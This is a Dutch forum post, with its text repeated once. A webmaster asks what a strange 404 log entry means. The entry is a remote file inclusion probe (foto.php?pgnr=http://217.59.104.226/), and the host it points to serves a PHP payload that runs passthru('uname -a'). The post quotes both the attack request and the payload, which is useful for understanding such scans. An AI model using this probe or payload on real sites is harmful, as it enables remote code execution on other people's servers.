Ik keek vanmiddag in mijn logs, bij de 404 error's, en ik kom het volgende tegen:
/foto/caravan/tersch/daaan/foto.php?pgnr=http://217.59.104.226/
daar stond een fotoscript.
Ik heb dat IP adres ingevoerd in mijn IE, en kreeg een pagina met alleen dit:
<? echo "\nbl3" . 'bl3 ' ; passthru("uname -a") ; ?>
Waarom zou iemand dit doen, dit is een opdracht om gegevens van het systeem te bemachtigen, of 't lukt, denk het niet.
Ik heb op google gezocht, een paar fora's melden dit ook, maar er is niet echt een antwoord.
Via een whois pagina ben ik er wel achter gekomen waar diegene weg komt (.it), ik heb ook al een abuse mailtje gestuurd met de info.
Maar wat ik graag wil weten, is wat dit is? en waarom iemand dit zou willen?
/foto/caravan/tersch/daaan/foto.php?pgnr=http://217.59.104.226/
daar stond een fotoscript.
Ik heb dat IP adres ingevoerd in mijn IE, en kreeg een pagina met alleen dit:
<? echo "\nbl3" . 'bl3 ' ; passthru("uname -a") ; ?>
Waarom zou iemand dit doen, dit is een opdracht om gegevens van het systeem te bemachtigen, of 't lukt, denk het niet.
Ik heb op google gezocht, een paar fora's melden dit ook, maar er is niet echt een antwoord.
Via een whois pagina ben ik er wel achter gekomen waar diegene weg komt (.it), ik heb ook al een abuse mailtje gestuurd met de info.
Maar wat ik graag wil weten, is wat dit is? en waarom iemand dit zou willen?
One's never alone with a rubber duck.